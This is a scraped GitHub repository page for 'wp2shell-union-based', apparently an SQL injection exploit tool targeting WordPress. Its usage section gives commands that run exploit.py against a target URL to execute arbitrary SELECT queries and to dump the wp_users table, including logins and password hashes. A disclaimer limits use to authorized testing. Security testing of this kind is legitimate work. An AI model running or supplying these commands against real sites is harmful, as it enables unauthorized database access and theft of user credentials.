Skip to content

lbherrera/wp2shell-union-based

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 

Repository files navigation

Usage

# Run any SELECT
python3 exploit.py http://TARGET "SELECT @@version"

# Dump wp_users (login + password hash)
python3 exploit.py http://TARGET "SELECT GROUP_CONCAT(user_login,0x3a,user_pass SEPARATOR 0x0a) FROM wp_users"

Legal

For authorized security testing and education only. Use exclusively against systems you own or have explicit written permission to test.

References

About

No description, website, or topics provided.

Resources

Stars

14 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages